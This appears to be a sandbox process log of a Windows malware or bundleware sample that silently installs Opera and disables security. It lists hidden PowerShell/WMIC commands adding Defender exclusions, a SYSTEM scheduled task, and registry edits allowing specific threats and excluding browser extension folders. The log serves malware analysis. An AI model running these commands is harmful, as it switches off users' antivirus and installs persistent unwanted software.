C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1760
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1816
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 964 -ip 964
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2192
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 964 -ip 964
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\s2EwgBFp\dwxwHVhiKNT.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2212
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\s2EwgBFp\dwxwHVhiKNT.exe"
C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe
C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe /did=757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2276
C:\Users\Admin\AppData\Local\Temp\s2EwgBFp\dwxwHVhiKNT.exe
C:\Users\Admin\AppData\Local\Temp\s2EwgBFp\dwxwHVhiKNT.exe --silent --allusers=0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1768
C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe --silent --allusers=0 --server-tracking-blob=ZjQ3Y2MzOWM4ZTRkMTYyMDk0NDEwOThjNjRkODQ4ZmQzODJjZjA3OWFiYTVmMTBkMzM4NWM5MzNlMzk0NWM0Yjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjA5Nzk5NDEuMjQ2OSIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiODkxZDBiOTUtMjM5OC00NWZkLTkxY2UtNjQxNDYyMzE5Nzg5In0=
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 964 -ip 964
C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x328,0x32c,0x330,0x304,0x334,0x71c3b1f4,0x71c3b200,0x71c3b20c
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2204
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4964 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240714175911" --session-guid=131e93da-5fbc-4690-a9e1-0b8588b48ff7 --server-tracking-blob=NmNlOGJiYjNkMjc5YjNlMzBjNzRiOTNiZDY2NGQ3ZDdlYmIxZGJiNDc0OGJmYTdjYjM1ODk1ZTdkZmYyZWZkNDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMDk3OTk0MS4yNDY5IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiI4OTFkMGI5NS0yMzk4LTQ1ZmQtOTFjZS02NDE0NjIzMTk3ODkifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7805000000000000
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1768
C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x320,0x324,0x334,0x2fc,0x338,0x70ceb1f4,0x70ceb200,0x70ceb20c
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 18:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe\" z0 /FDdidE 757674 /S" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1948
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x10f9f88,0x10f9f94,0x10f9fa0
C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe
C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe z0 /FDdidE 757674 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
